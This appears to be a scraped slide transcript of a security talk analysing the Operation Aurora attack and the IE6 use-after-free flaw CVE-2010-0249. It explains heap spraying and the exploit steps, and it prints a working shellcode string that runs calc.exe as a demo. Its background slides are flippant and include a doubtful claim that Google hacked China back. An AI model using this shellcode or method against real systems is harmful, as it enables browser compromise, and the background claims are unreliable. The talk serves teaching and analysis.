Presentation is loading. Please wait.

Presentation is loading. Please wait.

Exploit Analysis Anatomy of Aurora.

Similar presentations


Presentation on theme: "Exploit Analysis Anatomy of Aurora."— Presentation transcript:

1 Exploit Analysis Anatomy of Aurora

2 Anatomy of the Talk Background “Operation Aurora” The Heap
The Heap Spray The Vulnerability The Exploit The Code The Debugging The Demo The End

3 Background December ’09: China hacks Google
Adobe vulnerabilities suspected at first

4 Background December ’09: China hacks Google
Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit

5 Background December ’09: China hacks Google
Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law enforcement agencies to monitor s in order to spy on human rights activists and others

6 Background December ’09: China hacks Google
Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law enforcement agencies to monitor s in order to spy on human rights activists and others Jan ’10: Google attacks China Threatens to stop censoring search results

7 Background December ’09: China hacks Google
Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law enforcement agencies to monitor s in order to spy on human rights activists and others Jan ’10: Google attacks China Threatens to stop censoring search results Reveals they hacked China back- black hats ftw!

8 Background December ’09: China hacks Google
Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law enforcement agencies to monitor s in order to spy on human rights activists and others Jan ’10: Google attacks China Threatens to stop censoring search results Reveals they hacked China back- black hats ftw! The world goes ape-shit

9 Background December ’09: China hacks Google
Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law enforcement agencies to monitor s in order to spy on human rights activists and others Jan ’10: Google attacks China Threatens to stop censoring search results Reveals they hacked China back- black hats ftw! The world goes ape-shit Jan 14th Exploit code released on the net

10 “Operation Aurora” Sophisticated, multitier attack
1. Possible forgery

11 “Operation Aurora” Sophisticated, multitier attack
1. Possible forgery 2. 0-day IE6 exploit (CVE ) *16% browser share

12 “Operation Aurora” Sophisticated, multitier attack
1. Possible forgery 2. 0-day IE6 exploit (CVE ) *16% browser share 3. Payload downloads and activates malware

13 “Operation Aurora” Sophisticated, multitier attack
1. Possible forgery 2. 0-day IE6 exploit (CVE ) *16% browser share 3. Payload downloads and activates malware 4. Remote connection to attacker is established

14 “Operation Aurora” Sophisticated, multitier attack
1. Possible forgery 2. 0-day IE6 exploit (CVE ) *16% browser share 3. Payload downloads and activates malware 4. Remote connection to attacker is established 5. ???

15 “Operation Aurora” Sophisticated, multitier attack
1. Possible forgery 2. 0-day IE6 exploit (CVE ) *16% browser share 3. Payload downloads and activates malware 4. Remote connection to attacker is established 5. ??? 6. Profit

16 The Heap First, a little about memory
User applications store dynamic data in the heap HEAP AVAILABLE HEAP

17 The Heap First, a little about memory
User applications store dynamic data in the heap In windows, the heap extends until address 0x7fffffff 0x7fffffff HEAP USEABLE HEAP

18 The Heap First, a little about memory
User applications store dynamic data in the heap In windows, the heap extends until address 0x7fffffff As a program uses more memory, the useable heap grows HEAP USEABLE HEAP

19 The Heap First, a little about memory
User applications store dynamic data in the heap In windows, the heap extends until address 0x7fffffff As a program uses more memory, the useable heap grows The more the useable heap grows, the more space we have to play with… HEAP USEABLE HEAP

20 The Heap First, a little about memory
User applications store dynamic data in the heap In windows, the heap extends until address 0x7fffffff As a program uses more memory, the useable heap grows The more the useable heap grows, the more space we have to play with… How can we exploit this? HEAP USEABLE HEAP

21 The Heap Spray Heap spray!
Fills the heap up with garbage data + shellcode (ie “sprays” data at the heap) HEAP USEABLE HEAP INJECTED INJECTED INJECTED INJECTED

22 The Heap Spray Heap spray!
Fills the heap up with garbage data + shellcode (ie “sprays” data at the heap) If we can get our program to call or jump somewhere in our injected heap, win! HEAP USEABLE HEAP INJECTED INJECTED INJECTED jmp here plz kthx INJECTED

23 The Vulnerability CVE-2010-0249
HTML Object Memory Corruption Vulnerability “Use after free”

24 The Vulnerability CVE-2010-0249
HTML Object Memory Corruption Vulnerability “Use after free” Remote code execution

25 The Vulnerability CVE-2010-0249
HTML Object Memory Corruption Vulnerability “Use after free” Remote code execution Load an object, delete it, inject your code, call the object

26 The Vulnerability CVE-2010-0249
HTML Object Memory Corruption Vulnerability “Use after free” Remote code execution Load an object, delete it, inject your code, call the object In pictures!

27 The Vulnerability CVE-2010-0249
HTML Object Memory Corruption Vulnerability “Use after free” Remote code execution Load an object, delete it, inject your code, call the object In pictures! USEABLE HEAP

28 The Vulnerability CVE-2010-0249
HTML Object Memory Corruption Vulnerability “Use after free” Remote code execution Load an object, delete it, inject your code, call the object In pictures! ∙ Create an object USEABLE HEAP OBJECT

29 The Vulnerability CVE-2010-0249
HTML Object Memory Corruption Vulnerability “Use after free” Remote code execution Load an object, delete it, inject your code, call the object In pictures! USEABLE HEAP ∙ Create an object OBJECT

30 The Vulnerability CVE-2010-0249
HTML Object Memory Corruption Vulnerability “Use after free” Remote code execution Load an object, delete it, inject your code, call the object In pictures! USEABLE HEAP ∙ Delete object The memory shouldn’t be useable again without being reallocated…

31 The Vulnerability CVE-2010-0249
HTML Object Memory Corruption Vulnerability “Use after free” Remote code execution Load an object, delete it, inject your code, call the object In pictures! USEABLE HEAP ∙ Delete object The memory shouldn’t be useable again without being reallocated… but it is! USEABLE SPACE

32 The Exploit 5 Steps

33 The Exploit 5 Steps Create space to overwrite our yet to be created object with

34 The Exploit 5 Steps Create space to overwrite our yet to be created object with Spray the heap with nops and our payload

35 The Exploit 5 Steps Create space to overwrite our yet to be created object with Spray the heap with nops and our payload Load and dereference an image as our object

36 The Exploit 5 Steps Create space to overwrite our yet to be created object with Spray the heap with nops and our payload Load and dereference an image as our object Inject a pointer to our malicious code (step 2) inside the memory of our “image”

37 The Exploit 5 Steps Create space to overwrite our yet to be created object with Spray the heap with nops and our payload Load and dereference an image as our object Inject a pointer to our malicious code (step 2) inside the memory of our “image” Call the “image” again

38 The Code

39 The Debugging We’ll load up the exploit with our shell code:

40 The Debugging We’ll load up the exploit with our shell code:
payload = unescape("%uccccSHELLCODE SHELLCODE");

41 The Debugging We’ll load up the exploit with our shell code:
payload = unescape("%uccccSHELLCODE SHELLCODE"); If it works, EIP (the next instruction to be executed), should now contain “SHELLCODE SHELLCODE”

42 The Debugging We’ll load up the exploit with our shell code:
payload = unescape("%uccccSHELLCODE SHELLCODE"); If it works, EIP (the next instruction to be executed), should now contain “SHELLCODE SHELLCODE” Note: %ucccc == int 3, which is a debugging breakpoint

43 The Demo Inject shellcode to run calc.exe

44 The Demo Inject shellcode to run calc.exe
payload_calc = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407 %u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%u a63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4 bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c 0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d %ued92%u09e1%u9631%u5580");

45 The Demo Inject shellcode to run calc.exe Looks fancy, huh?
payload_calc = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407 %u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%u a63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4 bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c 0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d %ued92%u09e1%u9631%u5580"); Looks fancy, huh?

46 Questions? The end

47 References General In depth Code Presentation
In depth Code Presentation Under “Presentations”


Download ppt "Exploit Analysis Anatomy of Aurora."

Similar presentations


Ads by Google